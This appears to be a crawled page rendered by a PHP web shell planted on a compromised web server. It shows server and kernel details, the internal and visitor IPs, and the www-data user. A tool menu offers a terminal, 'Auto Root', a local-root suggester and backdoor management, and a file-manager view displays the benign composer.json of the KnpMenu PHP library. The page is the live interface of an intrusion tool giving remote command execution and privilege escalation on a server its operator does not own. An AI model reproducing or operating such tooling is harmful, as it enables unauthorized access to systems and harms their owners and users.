Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
vendor /
knplabs /
knp-menu /
Delete
Unzip
Name
Size
Permission
Date
Action
src
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
CHANGELOG.md
7.46
KB
-rwxrwxr-x
2025-06-13 15:03
LICENSE
1.06
KB
-rwxrwxr-x
2025-06-13 15:03
composer.json
1.44
KB
-rwxrwxr-x
2025-06-13 15:03
Save
Rename
{ "name": "knplabs/knp-menu", "type": "library", "description": "An object oriented menu library", "keywords": ["menu", "tree"], "homepage": "https://knplabs.com", "license": "MIT", "authors": [ { "name": "KnpLabs", "homepage": "https://knplabs.com" }, { "name": "Christophe Coevoet", "email": "stof@notk.org" }, { "name": "The Community", "homepage": "https://github.com/KnpLabs/KnpMenu/contributors" } ], "require": { "php": "^8.1" }, "conflict": { "symfony/http-foundation": "<5.4", "twig/twig": "<2.16" }, "require-dev": { "phpstan/phpstan": "^2.1", "phpunit/phpunit": "^9.6", "psr/container": "^1.0 || ^2.0", "symfony/http-foundation": "^5.4 || ^6.0 || ^7.0", "symfony/phpunit-bridge": "^7.0", "symfony/routing": "^5.4 || ^6.0 || ^7.0", "twig/twig": "^2.16 || ^3.0" }, "suggest": { "twig/twig": "for the TwigRenderer and the integration with your templates" }, "autoload": { "psr-4": { "Knp\\Menu\\": "src/Knp/Menu" } }, "autoload-dev": { "psr-4": { "Knp\\Menu\\Tests\\": "tests/Knp/Menu/Tests" } }, "config": { "sort-packages": true }, "extra": { "branch-alias": { "dev-master": "3.x-dev" } } }